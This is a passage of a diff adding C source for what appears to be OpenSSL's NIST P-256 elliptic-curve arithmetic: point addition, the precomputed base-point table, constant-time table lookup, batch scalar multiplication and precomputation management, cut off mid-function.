+        felem_assign(ftmp6, y1);
+        /* ftmp6[i] < 2^106 */
+    }
+
+    /* u2 = x2*z1z1 */
+    smallfelem_mul(tmp, x2, small1);
+    felem_reduce(ftmp4, tmp);
+
+    /* h = ftmp4 = u2 - u1 */
+    felem_diff_zero107(ftmp4, ftmp3);
+    /* ftmp4[i] < 2^107 + 2^101 < 2^108 */
+    felem_shrink(small4, ftmp4);
+
+    x_equal = smallfelem_is_zero(small4);
+
+    /* z_out = ftmp5 * h */
+    felem_small_mul(tmp, small4, ftmp5);
+    felem_reduce(z_out, tmp);
+    /* z_out[i] < 2^101 */
+
+    /* ftmp = z1 * z1z1 */
+    smallfelem_mul(tmp, small1, small3);
+    felem_reduce(ftmp, tmp);
+
+    /* s2 = tmp = y2 * z1**3 */
+    felem_small_mul(tmp, y2, ftmp);
+    felem_reduce(ftmp5, tmp);
+
+    /* r = ftmp5 = (s2 - s1)*2 */
+    felem_diff_zero107(ftmp5, ftmp6);
+    /* ftmp5[i] < 2^107 + 2^107 = 2^108 */
+    felem_scalar(ftmp5, 2);
+    /* ftmp5[i] < 2^109 */
+    felem_shrink(small1, ftmp5);
+    y_equal = smallfelem_is_zero(small1);
+
+    if (x_equal && y_equal && !z1_is_zero && !z2_is_zero) {
+        point_double(x3, y3, z3, x1, y1, z1);
+        return;
+    }
+
+    /* I = ftmp = (2h)**2 */
+    felem_assign(ftmp, ftmp4);
+    felem_scalar(ftmp, 2);
+    /* ftmp[i] < 2*2^108 = 2^109 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);
+
+    /* J = ftmp2 = h * I */
+    felem_mul(tmp, ftmp4, ftmp);
+    felem_reduce(ftmp2, tmp);
+
+    /* V = ftmp4 = U1 * I */
+    felem_mul(tmp, ftmp3, ftmp);
+    felem_reduce(ftmp4, tmp);
+
+    /* x_out = r**2 - J - 2V */
+    smallfelem_square(tmp, small1);
+    felem_reduce(x_out, tmp);
+    felem_assign(ftmp3, ftmp4);
+    felem_scalar(ftmp4, 2);
+    felem_sum(ftmp4, ftmp2);
+    /* ftmp4[i] < 2*2^101 + 2^101 < 2^103 */
+    felem_diff(x_out, ftmp4);
+    /* x_out[i] < 2^105 + 2^101 */
+
+    /* y_out = r(V-x_out) - 2 * s1 * J */
+    felem_diff_zero107(ftmp3, x_out);
+    /* ftmp3[i] < 2^107 + 2^101 < 2^108 */
+    felem_small_mul(tmp, small1, ftmp3);
+    felem_mul(tmp2, ftmp6, ftmp2);
+    longfelem_scalar(tmp2, 2);
+    /* tmp2[i] < 2*2^67 = 2^68 */
+    longfelem_diff(tmp, tmp2);
+    /* tmp[i] < 2^67 + 2^70 + 2^40 < 2^71 */
+    felem_reduce_zero105(y_out, tmp);
+    /* y_out[i] < 2^106 */
+
+    copy_small_conditional(x_out, x2, z1_is_zero);
+    copy_conditional(x_out, x1, z2_is_zero);
+    copy_small_conditional(y_out, y2, z1_is_zero);
+    copy_conditional(y_out, y1, z2_is_zero);
+    copy_small_conditional(z_out, z2, z1_is_zero);
+    copy_conditional(z_out, z1, z2_is_zero);
+    felem_assign(x3, x_out);
+    felem_assign(y3, y_out);
+    felem_assign(z3, z_out);
+}
+
+/*
+ * point_add_small is the same as point_add, except that it operates on
+ * smallfelems
+ */
+static void point_add_small(smallfelem x3, smallfelem y3, smallfelem z3,
+                            smallfelem x1, smallfelem y1, smallfelem z1,
+                            smallfelem x2, smallfelem y2, smallfelem z2)
+{
+    felem felem_x3, felem_y3, felem_z3;
+    felem felem_x1, felem_y1, felem_z1;
+    smallfelem_expand(felem_x1, x1);
+    smallfelem_expand(felem_y1, y1);
+    smallfelem_expand(felem_z1, z1);
+    point_add(felem_x3, felem_y3, felem_z3, felem_x1, felem_y1, felem_z1, 0,
+              x2, y2, z2);
+    felem_shrink(x3, felem_x3);
+    felem_shrink(y3, felem_y3);
+    felem_shrink(z3, felem_z3);
+}
+
+/*-
+ * Base point pre computation
+ * --------------------------
+ *
+ * Two different sorts of precomputed tables are used in the following code.
+ * Each contain various points on the curve, where each point is three field
+ * elements (x, y, z).
+ *
+ * For the base point table, z is usually 1 (0 for the point at infinity).
+ * This table has 2 * 16 elements, starting with the following:
+ * index | bits    | point
+ * ------+---------+------------------------------
+ *     0 | 0 0 0 0 | 0G
+ *     1 | 0 0 0 1 | 1G
+ *     2 | 0 0 1 0 | 2^64G
+ *     3 | 0 0 1 1 | (2^64 + 1)G
+ *     4 | 0 1 0 0 | 2^128G
+ *     5 | 0 1 0 1 | (2^128 + 1)G
+ *     6 | 0 1 1 0 | (2^128 + 2^64)G
+ *     7 | 0 1 1 1 | (2^128 + 2^64 + 1)G
+ *     8 | 1 0 0 0 | 2^192G
+ *     9 | 1 0 0 1 | (2^192 + 1)G
+ *    10 | 1 0 1 0 | (2^192 + 2^64)G
+ *    11 | 1 0 1 1 | (2^192 + 2^64 + 1)G
+ *    12 | 1 1 0 0 | (2^192 + 2^128)G
+ *    13 | 1 1 0 1 | (2^192 + 2^128 + 1)G
+ *    14 | 1 1 1 0 | (2^192 + 2^128 + 2^64)G
+ *    15 | 1 1 1 1 | (2^192 + 2^128 + 2^64 + 1)G
+ * followed by a copy of this with each element multiplied by 2^32.
+ *
+ * The reason for this is so that we can clock bits into four different
+ * locations when doing simple scalar multiplies against the base point,
+ * and then another four locations using the second 16 elements.
+ *
+ * Tables for other points have table[i] = iG for i in 0 .. 16. */
+
+/* gmul is the table of precomputed base points */
+static const smallfelem gmul[2][16][3] = {
+    {{{0, 0, 0, 0},
+      {0, 0, 0, 0},
+      {0, 0, 0, 0}},
+     {{0xf4a13945d898c296, 0x77037d812deb33a0, 0xf8bce6e563a440f2,
+       0x6b17d1f2e12c4247},
+      {0xcbb6406837bf51f5, 0x2bce33576b315ece, 0x8ee7eb4a7c0f9e16,
+       0x4fe342e2fe1a7f9b},
+      {1, 0, 0, 0}},
+     {{0x90e75cb48e14db63, 0x29493baaad651f7e, 0x8492592e326e25de,
+       0x0fa822bc2811aaa5},
+      {0xe41124545f462ee7, 0x34b1a65050fe82f5, 0x6f4ad4bcb3df188b,
+       0xbff44ae8f5dba80d},
+      {1, 0, 0, 0}},
+     {{0x93391ce2097992af, 0xe96c98fd0d35f1fa, 0xb257c0de95e02789,
+       0x300a4bbc89d6726f},
+      {0xaa54a291c08127a0, 0x5bb1eeada9d806a5, 0x7f1ddb25ff1e3c6f,
+       0x72aac7e0d09b4644},
+      {1, 0, 0, 0}},
+     {{0x57c84fc9d789bd85, 0xfc35ff7dc297eac3, 0xfb982fd588c6766e,
+       0x447d739beedb5e67},
+      {0x0c7e33c972e25b32, 0x3d349b95a7fae500, 0xe12e9d953a4aaff7,
+       0x2d4825ab834131ee},
+      {1, 0, 0, 0}},
+     {{0x13949c932a1d367f, 0xef7fbd2b1a0a11b7, 0xddc6068bb91dfc60,
+       0xef9519328a9c72ff},
+      {0x196035a77376d8a8, 0x23183b0895ca1740, 0xc1ee9807022c219c,
+       0x611e9fc37dbb2c9b},
+      {1, 0, 0, 0}},
+     {{0xcae2b1920b57f4bc, 0x2936df5ec6c9bc36, 0x7dea6482e11238bf,
+       0x550663797b51f5d8},
+      {0x44ffe216348a964c, 0x9fb3d576dbdefbe1, 0x0afa40018d9d50e5,
+       0x157164848aecb851},
+      {1, 0, 0, 0}},
+     {{0xe48ecafffc5cde01, 0x7ccd84e70d715f26, 0xa2e8f483f43e4391,
+       0xeb5d7745b21141ea},
+      {0xcac917e2731a3479, 0x85f22cfe2844b645, 0x0990e6a158006cee,
+       0xeafd72ebdbecc17b},
+      {1, 0, 0, 0}},
+     {{0x6cf20ffb313728be, 0x96439591a3c6b94a, 0x2736ff8344315fc5,
+       0xa6d39677a7849276},
+      {0xf2bab833c357f5f4, 0x824a920c2284059b, 0x66b8babd2d27ecdf,
+       0x674f84749b0b8816},
+      {1, 0, 0, 0}},
+     {{0x2df48c04677c8a3e, 0x74e02f080203a56b, 0x31855f7db8c7fedb,
+       0x4e769e7672c9ddad},
+      {0xa4c36165b824bbb0, 0xfb9ae16f3b9122a5, 0x1ec0057206947281,
+       0x42b99082de830663},
+      {1, 0, 0, 0}},
+     {{0x6ef95150dda868b9, 0xd1f89e799c0ce131, 0x7fdc1ca008a1c478,
+       0x78878ef61c6ce04d},
+      {0x9c62b9121fe0d976, 0x6ace570ebde08d4f, 0xde53142c12309def,
+       0xb6cb3f5d7b72c321},
+      {1, 0, 0, 0}},
+     {{0x7f991ed2c31a3573, 0x5b82dd5bd54fb496, 0x595c5220812ffcae,
+       0x0c88bc4d716b1287},
+      {0x3a57bf635f48aca8, 0x7c8181f4df2564f3, 0x18d1b5b39c04e6aa,
+       0xdd5ddea3f3901dc6},
+      {1, 0, 0, 0}},
+     {{0xe96a79fb3e72ad0c, 0x43a0a28c42ba792f, 0xefe0a423083e49f3,
+       0x68f344af6b317466},
+      {0xcdfe17db3fb24d4a, 0x668bfc2271f5c626, 0x604ed93c24d67ff3,
+       0x31b9c405f8540a20},
+      {1, 0, 0, 0}},
+     {{0xd36b4789a2582e7f, 0x0d1a10144ec39c28, 0x663c62c3edbad7a0,
+       0x4052bf4b6f461db9},
+      {0x235a27c3188d25eb, 0xe724f33999bfcc5b, 0x862be6bd71d70cc8,
+       0xfecf4d5190b0fc61},
+      {1, 0, 0, 0}},
+     {{0x74346c10a1d4cfac, 0xafdf5cc08526a7a4, 0x123202a8f62bff7a,
+       0x1eddbae2c802e41a},
+      {0x8fa0af2dd603f844, 0x36e06b7e4c701917, 0x0c45f45273db33a0,
+       0x43104d86560ebcfc},
+      {1, 0, 0, 0}},
+     {{0x9615b5110d1d78e5, 0x66b0de3225c4744b, 0x0a4a46fb6aaf363a,
+       0xb48e26b484f7a21c},
+      {0x06ebb0f621a01b2d, 0xc004e4048b7b0f98, 0x64131bcdfed6f668,
+       0xfac015404d4d3dab},
+      {1, 0, 0, 0}}},
+    {{{0, 0, 0, 0},
+      {0, 0, 0, 0},
+      {0, 0, 0, 0}},
+     {{0x3a5a9e22185a5943, 0x1ab919365c65dfb6, 0x21656b32262c71da,
+       0x7fe36b40af22af89},
+      {0xd50d152c699ca101, 0x74b3d5867b8af212, 0x9f09f40407dca6f1,
+       0xe697d45825b63624},
+      {1, 0, 0, 0}},
+     {{0xa84aa9397512218e, 0xe9a521b074ca0141, 0x57880b3a18a2e902,
+       0x4a5b506612a677a6},
+      {0x0beada7a4c4f3840, 0x626db15419e26d9d, 0xc42604fbe1627d40,
+       0xeb13461ceac089f1},
+      {1, 0, 0, 0}},
+     {{0xf9faed0927a43281, 0x5e52c4144103ecbc, 0xc342967aa815c857,
+       0x0781b8291c6a220a},
+      {0x5a8343ceeac55f80, 0x88f80eeee54a05e3, 0x97b2a14f12916434,
+       0x690cde8df0151593},
+      {1, 0, 0, 0}},
+     {{0xaee9c75df7f82f2a, 0x9e4c35874afdf43a, 0xf5622df437371326,
+       0x8a535f566ec73617},
+      {0xc5f9a0ac223094b7, 0xcde533864c8c7669, 0x37e02819085a92bf,
+       0x0455c08468b08bd7},
+      {1, 0, 0, 0}},
+     {{0x0c0a6e2c9477b5d9, 0xf9a4bf62876dc444, 0x5050a949b6cdc279,
+       0x06bada7ab77f8276},
+      {0xc8b4aed1ea48dac9, 0xdebd8a4b7ea1070f, 0x427d49101366eb70,
+       0x5b476dfd0e6cb18a},
+      {1, 0, 0, 0}},
+     {{0x7c5c3e44278c340a, 0x4d54606812d66f3b, 0x29a751b1ae23c5d8,
+       0x3e29864e8a2ec908},
+      {0x142d2a6626dbb850, 0xad1744c4765bd780, 0x1f150e68e322d1ed,
+       0x239b90ea3dc31e7e},
+      {1, 0, 0, 0}},
+     {{0x78c416527a53322a, 0x305dde6709776f8e, 0xdbcab759f8862ed4,
+       0x820f4dd949f72ff7},
+      {0x6cc544a62b5debd4, 0x75be5d937b4e8cc4, 0x1b481b1b215c14d3,
+       0x140406ec783a05ec},
+      {1, 0, 0, 0}},
+     {{0x6a703f10e895df07, 0xfd75f3fa01876bd8, 0xeb5b06e70ce08ffe,
+       0x68f6b8542783dfee},
+      {0x90c76f8a78712655, 0xcf5293d2f310bf7f, 0xfbc8044dfda45028,
+       0xcbe1feba92e40ce6},
+      {1, 0, 0, 0}},
+     {{0xe998ceea4396e4c1, 0xfc82ef0b6acea274, 0x230f729f2250e927,
+       0xd0b2f94d2f420109},
+      {0x4305adddb38d4966, 0x10b838f8624c3b45, 0x7db2636658954e7a,
+       0x971459828b0719e5},
+      {1, 0, 0, 0}},
+     {{0x4bd6b72623369fc9, 0x57f2929e53d0b876, 0xc2d5cba4f2340687,
+       0x961610004a866aba},
+      {0x49997bcd2e407a5e, 0x69ab197d92ddcb24, 0x2cf1f2438fe5131c,
+       0x7acb9fadcee75e44},
+      {1, 0, 0, 0}},
+     {{0x254e839423d2d4c0, 0xf57f0c917aea685b, 0xa60d880f6f75aaea,
+       0x24eb9acca333bf5b},
+      {0xe3de4ccb1cda5dea, 0xfeef9341c51a6b4f, 0x743125f88bac4c4d,
+       0x69f891c5acd079cc},
+      {1, 0, 0, 0}},
+     {{0xeee44b35702476b5, 0x7ed031a0e45c2258, 0xb422d1e7bd6f8514,
+       0xe51f547c5972a107},
+      {0xa25bcd6fc9cf343d, 0x8ca922ee097c184e, 0xa62f98b3a9fe9a06,
+       0x1c309a2b25bb1387},
+      {1, 0, 0, 0}},
+     {{0x9295dbeb1967c459, 0xb00148833472c98e, 0xc504977708011828,
+       0x20b87b8aa2c4e503},
+      {0x3063175de057c277, 0x1bd539338fe582dd, 0x0d11adef5f69a044,
+       0xf5c6fa49919776be},
+      {1, 0, 0, 0}},
+     {{0x8c944e760fd59e11, 0x3876cba1102fad5f, 0xa454c3fad83faa56,
+       0x1ed7d1b9332010b9},
+      {0xa1011a270024b889, 0x05e4d0dcac0cd344, 0x52b520f0eb6a2a24,
+       0x3a2b03f03217257a},
+      {1, 0, 0, 0}},
+     {{0xf20fc2afdf1d043d, 0xf330240db58d5a62, 0xfc7d229ca0058c3b,
+       0x15fee545c78dd9f6},
+      {0x501e82885bc98cda, 0x41ef80e5d046ac04, 0x557d9f49461210fb,
+       0x4ab5b6b2b8753f81},
+      {1, 0, 0, 0}}}
+};
+
+/*
+ * select_point selects the |idx|th point from a precomputation table and
+ * copies it to out.
+ */
+static void select_point(const u64 idx, unsigned int size,
+                         const smallfelem pre_comp[16][3], smallfelem out[3])
+{
+    unsigned i, j;
+    u64 *outlimbs = &out[0][0];
+    memset(outlimbs, 0, 3 * sizeof(smallfelem));
+
+    for (i = 0; i < size; i++) {
+        const u64 *inlimbs = (u64 *)&pre_comp[i][0][0];
+        u64 mask = i ^ idx;
+        mask |= mask >> 4;
+        mask |= mask >> 2;
+        mask |= mask >> 1;
+        mask &= 1;
+        mask--;
+        for (j = 0; j < NLIMBS * 3; j++)
+            outlimbs[j] |= inlimbs[j] & mask;
+    }
+}
+
+/* get_bit returns the |i|th bit in |in| */
+static char get_bit(const felem_bytearray in, int i)
+{
+    if ((i < 0) || (i >= 256))
+        return 0;
+    return (in[i >> 3] >> (i & 7)) & 1;
+}
+
+/*
+ * Interleaved point multiplication using precomputed point multiples: The
+ * small point multiples 0*P, 1*P, ..., 17*P are in pre_comp[], the scalars
+ * in scalars[]. If g_scalar is non-NULL, we also add this multiple of the
+ * generator, using certain (large) precomputed multiples in g_pre_comp.
+ * Output point (X, Y, Z) is stored in x_out, y_out, z_out
+ */
+static void batch_mul(felem x_out, felem y_out, felem z_out,
+                      const felem_bytearray scalars[],
+                      const unsigned num_points, const u8 *g_scalar,
+                      const int mixed, const smallfelem pre_comp[][17][3],
+                      const smallfelem g_pre_comp[2][16][3])
+{
+    int i, skip;
+    unsigned num, gen_mul = (g_scalar != NULL);
+    felem nq[3], ftmp;
+    smallfelem tmp[3];
+    u64 bits;
+    u8 sign, digit;
+
+    /* set nq to the point at infinity */
+    memset(nq, 0, 3 * sizeof(felem));
+
+    /*
+     * Loop over all scalars msb-to-lsb, interleaving additions of multiples
+     * of the generator (two in each of the last 32 rounds) and additions of
+     * other points multiples (every 5th round).
+     */
+    skip = 1;                   /* save two point operations in the first
+                                 * round */
+    for (i = (num_points ? 255 : 31); i >= 0; --i) {
+        /* double */
+        if (!skip)
+            point_double(nq[0], nq[1], nq[2], nq[0], nq[1], nq[2]);
+
+        /* add multiples of the generator */
+        if (gen_mul && (i <= 31)) {
+            /* first, look 32 bits upwards */
+            bits = get_bit(g_scalar, i + 224) << 3;
+            bits |= get_bit(g_scalar, i + 160) << 2;
+            bits |= get_bit(g_scalar, i + 96) << 1;
+            bits |= get_bit(g_scalar, i + 32);
+            /* select the point to add, in constant time */
+            select_point(bits, 16, g_pre_comp[1], tmp);
+
+            if (!skip) {
+                /* Arg 1 below is for "mixed" */
+                point_add(nq[0], nq[1], nq[2],
+                          nq[0], nq[1], nq[2], 1, tmp[0], tmp[1], tmp[2]);
+            } else {
+                smallfelem_expand(nq[0], tmp[0]);
+                smallfelem_expand(nq[1], tmp[1]);
+                smallfelem_expand(nq[2], tmp[2]);
+                skip = 0;
+            }
+
+            /* second, look at the current position */
+            bits = get_bit(g_scalar, i + 192) << 3;
+            bits |= get_bit(g_scalar, i + 128) << 2;
+            bits |= get_bit(g_scalar, i + 64) << 1;
+            bits |= get_bit(g_scalar, i);
+            /* select the point to add, in constant time */
+            select_point(bits, 16, g_pre_comp[0], tmp);
+            /* Arg 1 below is for "mixed" */
+            point_add(nq[0], nq[1], nq[2],
+                      nq[0], nq[1], nq[2], 1, tmp[0], tmp[1], tmp[2]);
+        }
+
+        /* do other additions every 5 doublings */
+        if (num_points && (i % 5 == 0)) {
+            /* loop over all scalars */
+            for (num = 0; num < num_points; ++num) {
+                bits = get_bit(scalars[num], i + 4) << 5;
+                bits |= get_bit(scalars[num], i + 3) << 4;
+                bits |= get_bit(scalars[num], i + 2) << 3;
+                bits |= get_bit(scalars[num], i + 1) << 2;
+                bits |= get_bit(scalars[num], i) << 1;
+                bits |= get_bit(scalars[num], i - 1);
+                ec_GFp_nistp_recode_scalar_bits(&sign, &digit, bits);
+
+                /*
+                 * select the point to add or subtract, in constant time
+                 */
+                select_point(digit, 17, pre_comp[num], tmp);
+                smallfelem_neg(ftmp, tmp[1]); /* (X, -Y, Z) is the negative
+                                               * point */
+                copy_small_conditional(ftmp, tmp[1], (((limb) sign) - 1));
+                felem_contract(tmp[1], ftmp);
+
+                if (!skip) {
+                    point_add(nq[0], nq[1], nq[2],
+                              nq[0], nq[1], nq[2],
+                              mixed, tmp[0], tmp[1], tmp[2]);
+                } else {
+                    smallfelem_expand(nq[0], tmp[0]);
+                    smallfelem_expand(nq[1], tmp[1]);
+                    smallfelem_expand(nq[2], tmp[2]);
+                    skip = 0;
+                }
+            }
+        }
+    }
+    felem_assign(x_out, nq[0]);
+    felem_assign(y_out, nq[1]);
+    felem_assign(z_out, nq[2]);
+}
+
+/* Precomputation for the group generator. */
+typedef struct {
+    smallfelem g_pre_comp[2][16][3];
+    int references;
+} NISTP256_PRE_COMP;
+
+const EC_METHOD *EC_GFp_nistp256_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_nistp256_group_init,
+        ec_GFp_simple_group_finish,
+        ec_GFp_simple_group_clear_finish,
+        ec_GFp_nist_group_copy,
+        ec_GFp_nistp256_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_nistp256_point_get_affine_coordinates,
+        0 /* point_set_compressed_coordinates */ ,
+        0 /* point2oct */ ,
+        0 /* oct2point */ ,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        ec_GFp_nistp256_points_mul,
+        ec_GFp_nistp256_precompute_mult,
+        ec_GFp_nistp256_have_precompute_mult,
+        ec_GFp_nist_field_mul,
+        ec_GFp_nist_field_sqr,
+        0 /* field_div */ ,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+    return &ret;
+}
+
+/******************************************************************************/
+/*
+ * FUNCTIONS TO MANAGE PRECOMPUTATION
+ */
+
+static NISTP256_PRE_COMP *nistp256_pre_comp_new()
+{
+    NISTP256_PRE_COMP *ret = NULL;
+    ret = (NISTP256_PRE_COMP *) OPENSSL_malloc(sizeof *ret);
+    if (!ret) {
+        ECerr(EC_F_NISTP256_PRE_COMP_NEW, ERR_R_MALLOC_FAILURE);
+        return ret;
+    }
+    memset(ret->g_pre_comp, 0, sizeof(ret->g_pre_comp));
+    ret->references = 1;
+    return ret;
+}
+
+static void *nistp256_pre_comp_dup(void *src_)
+{
+    NISTP256_PRE_COMP *src = src_;
+
+    /* no need to actually copy, these objects never change! */
+    CRYPTO_add(&src->references, 1, CRYPTO_LOCK_EC_PRE_COMP);
+
+    return src_;
+}
+
+static void nistp256_pre_comp_free(void *pre_)
+{
+    int i;
+    NISTP256_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    OPENSSL_free(pre);
+}
+
+static void nistp256_pre_comp_clear_free(void *pre_)
+{
+    int i;
+    NISTP256_PRE_COMP *pre = pre_;
+
+    if (!pre)
+        return;
+
+    i = CRYPTO_add(&pre->references, -1, CRYPTO_LOCK_EC_PRE_COMP);
+    if (i > 0)
+        return;
+
+    OPENSSL_cleanse(pre, sizeof *pre);
+    OPENSSL_free(pre);
+}
+
+/******************************************************************************/
+/*
+ * OPENSSL EC_METHOD FUNCTIONS
+ */
+
+int ec_GFp_nistp256_group_init(EC_GROUP *group)
+{
+    int ret;
+    ret = ec_GFp_simple_group_init(group);
+    group->a_is_minus3 = 1;
+    return ret;
+}
+
+int ec_GFp_nistp256_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                    const BIGNUM *a, const BIGNUM *b,
+                                    BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *curve_p, *curve_a, *curve_b;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((curve_p = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_a = BN_CTX_get(ctx)) == NULL) ||
+        ((curve_b = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    BN_bin2bn(nistp256_curve_params[0], sizeof(felem_bytearray), curve_p);
+    BN_bin2bn(nistp256_curve_params[1], sizeof(felem_bytearray), curve_a);
+    BN_bin2bn(nistp256_curve_params[2], sizeof(felem_bytearray), curve_b);
+    if ((BN_cmp(curve_p, p)) || (BN_cmp(curve_a, a)) || (BN_cmp(curve_b, b))) {
+        ECerr(EC_F_EC_GFP_NISTP256_GROUP_SET_CURVE,
+              EC_R_WRONG_CURVE_PARAMETERS);
+        goto err;
+    }
+    group->field_mod_func = BN_nist_mod_256;
+    ret = ec_GFp_simple_group_set_curve(group, p, a, b, ctx);
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Takes the Jacobian coordinates (X, Y, Z) of a point and returns (X', Y') =
+ * (X/Z^2, Y/Z^3)
+ */
+int ec_GFp_nistp256_point_get_affine_coordinates(const EC_GROUP *group,
+                                                 const EC_POINT *point,
+                                                 BIGNUM *x, BIGNUM *y,
+                                                 BN_CTX *ctx)
+{
+    felem z1, z2, x_in, y_in;
+    smallfelem x_out, y_out;
+    longfelem tmp;
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES,
+              EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+    if ((!BN_to_felem(x_in, &point->X)) || (!BN_to_felem(y_in, &point->Y)) ||
+        (!BN_to_felem(z1, &point->Z)))
+        return 0;
+    felem_inv(z2, z1);
+    felem_square(tmp, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, x_in, z1);
+    felem_reduce(x_in, tmp);
+    felem_contract(x_out, x_in);
+    if (x != NULL) {
+        if (!smallfelem_to_BN(x, x_out)) {
+            ECerr(EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    felem_mul(tmp, z1, z2);
+    felem_reduce(z1, tmp);
+    felem_mul(tmp, y_in, z1);
+    felem_reduce(y_in, tmp);
+    felem_contract(y_out, y_in);
+    if (y != NULL) {
+        if (!smallfelem_to_BN(y, y_out)) {
+            ECerr(EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+/* points below is of size |num|, and tmp_smallfelems is of size |num+1| */
+static void make_points_affine(size_t num, smallfelem points[][3],
+                               smallfelem tmp_smallfelems[])
+{
+    /*
+     * Runs in constant time, unless an input is the point at infinity (which
+     * normally shouldn't happen).
+     */
+    ec_GFp_nistp_points_make_affine_internal(num,
+                                             points,
+                                             sizeof(smallfelem),
+                                             tmp_smallfelems,
+                                             (void (*)(void *))smallfelem_one,
+                                             (int (*)(const void *))
+                                             smallfelem_is_zero_int,
+                                             (void (*)(void *, const void *))
+                                             smallfelem_assign,
+                                             (void (*)(void *, const void *))
+                                             smallfelem_square_contract,
+                                             (void (*)
+                                              (void *, const void *,
+                                               const void *))
+                                             smallfelem_mul_contract,
+                                             (void (*)(void *, const void *))
+                                             smallfelem_inv_contract,
+                                             /* nothing to contract */
+                                             (void (*)(void *, const void *))
+                                             smallfelem_assign);
+}
+
+/*
+ * Computes scalar*generator + \sum scalars[i]*points[i], ignoring NULL
+ * values Result is stored in r (r can equal one of the inputs).
+ */
+int ec_GFp_nistp256_points_mul(const EC_GROUP *group, EC_POINT *r,
+                               const BIGNUM *scalar, size_t num,
+                               const EC_POINT *points[],
+                               const BIGNUM *scalars[], BN_CTX *ctx)
+{
+    int ret = 0;
+    int j;
+    int mixed = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y, *z, *tmp_scalar;
+    felem_bytearray g_secret;
+    felem_bytearray *secrets = NULL;
+    smallfelem(*pre_comp)[17][3] = NULL;
+    smallfelem *tmp_smallfelems = NULL;
+    felem_bytearray tmp;
+    unsigned i, num_bytes;
+    int have_pre_comp = 0;
+    size_t num_points = num;
+    smallfelem x_in, y_in, z_in;
+    felem x_out, y_out, z_out;
+    NISTP256_PRE_COMP *pre = NULL;
+    const smallfelem(*g_pre_comp)[16][3] = NULL;
+    EC_POINT *generator = NULL;
+    const EC_POINT *p = NULL;
+    const BIGNUM *p_scalar = NULL;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) ||
+        ((y = BN_CTX_get(ctx)) == NULL) ||
+        ((z = BN_CTX_get(ctx)) == NULL) ||
+        ((tmp_scalar = BN_CTX_get(ctx)) == NULL))
+        goto err;
+
+    if (scalar != NULL) {
+        pre = EC_EX_DATA_get_data(group->extra_data,
+                                  nistp256_pre_comp_dup,
+                                  nistp256_pre_comp_free,
+                                  nistp256_pre_comp_clear_free);
+        if (pre)
+            /* we have precomputation, try to use it */
+            g_pre_comp = (const smallfelem(*)[16][3])pre->g_pre_comp;
+        else
+            /* try to use the standard precomputation */
+            g_pre_comp = &gmul[0];
+        generator = EC_POINT_new(group);
+        if (generator == NULL)
+            goto err;
+        /* get the generator from precomputation */
+        if (!smallfelem_to_BN(x, g_pre_comp[0][1][0]) ||
+            !smallfelem_to_BN(y, g_pre_comp[0][1][1]) ||
+            !smallfelem_to_BN(z, g_pre_comp[0][1][2])) {
+            ECerr(EC_F_EC_GFP_NISTP256_POINTS_MUL, ERR_R_BN_LIB);
+            goto err;
+        }
+        if (!EC_POINT_set_Jprojective_coordinates_GFp(group,
+                                                      generator, x, y, z,
+                                                      ctx))
+            goto err;
+        if (0 == EC_POINT_cmp(group, generator, group->generator, ctx))
+            /* precomputation matches generator */
+            have_pre_comp = 1;
+        else
+            /*
+             * we don't have valid precomputation: treat the generator as a
+             * random point
+             */
+            num_points++;
+    }
+    if (num_points > 0) {
+        if (num_points >= 3) {
+            /*
+             * unless we precompute multiples for just one or two points,
+             * converting those into affine form is time well spent
+             */
+            mixed = 1;
+        }
+        secrets = OPENSSL_malloc(num_points * sizeof(felem_bytearray));
+        pre_comp = OPENSSL_malloc(num_points * 17 * 3 * sizeof(smallfelem));
+        if (mixed)
+            tmp_smallfelems =
+                OPENSSL_malloc((num_points * 17 + 1) * sizeof(smallfelem));
+        if ((secrets == NULL) || (pre_comp == NULL)
+            || (mixed && (tmp_smallfelems == NULL))) {
+            ECerr(EC_F_EC_GFP_NISTP256_POINTS_MUL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /*
+         * we treat NULL scalars as 0, and NULL points as points at infinity,
